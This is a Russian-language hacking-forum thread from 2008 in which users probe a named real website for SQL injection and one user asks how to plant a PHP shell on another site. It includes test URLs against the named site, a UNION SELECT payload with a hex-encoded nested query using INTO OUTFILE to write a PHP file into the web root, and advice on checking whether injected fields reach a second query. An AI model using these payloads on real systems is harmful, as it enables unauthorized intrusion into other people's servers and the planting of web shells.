HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.05.2008, 14:04
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
С нами: 9718355

Репутация: 310
По умолчанию

Цитата:
Сообщение от AFoST  
Чёт не разберусь никак с одной скулей...Может кто справится!?
Код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d 
 
Ответить с цитированием

  #2  
Старый 30.05.2008, 14:16
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от brasco2k  
помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d 
Как видишь, ошибка мускула есть логично предположить, что это инъекция Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь...

возможно это инъекция после лимита, т.к.
Код:
http://micropig.com/microlink/category/58/start/3,1,1,2 -error

http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error
http://micropig.com/microlink/category/58/start/3,1/* -no error
 
Ответить с цитированием

  #3  
Старый 30.05.2008, 14:18
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Я про этот случай:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123'

Нет там иньекта, он ругается каждый раз когда не может чтото найти, например:

http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 30.05.2008 в 14:21..
 
Ответить с цитированием

  #4  
Старый 30.05.2008, 14:48
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

AFoST
Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос
Сдесь:
_http://micropig.com/microlink/?srch=2&start=30&searchtext=123
такой возможности нет
Сдесь:
_http://micropig.com/microlink/category/58/start/3
тройка это limit 3 т.е. можно повлиять так как ты описал:
_http://micropig.com/microlink/category/58/start/3,1/*
limit 3 offset 1(offset по умолчанию = 37)
Но ничего путного от этой инъекции (в mysql) не добиться
 
Ответить с цитированием

  #5  
Старый 30.05.2008, 14:35
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?
 
Ответить с цитированием

  #6  
Старый 30.05.2008, 14:51
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

0nep@t0p
Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #7  
Старый 30.05.2008, 15:30
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

2 l-l00K
Запрос такой:
-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19/*
То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C6563 7420273C3F70687020706870696E666F28293B203F3E2C3220 66726F6D206D7973716C2E7573657220696E746F206F757466 696C6520272F686F6D652F736974652F7075626C69635F6874 6D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/*
Правильно ?
 
Ответить с цитированием

  #8  
Старый 30.05.2008, 15:37
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #9  
Старый 30.05.2008, 15:42
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию

Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
 
Ответить с цитированием

  #10  
Старый 30.05.2008, 15:46
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.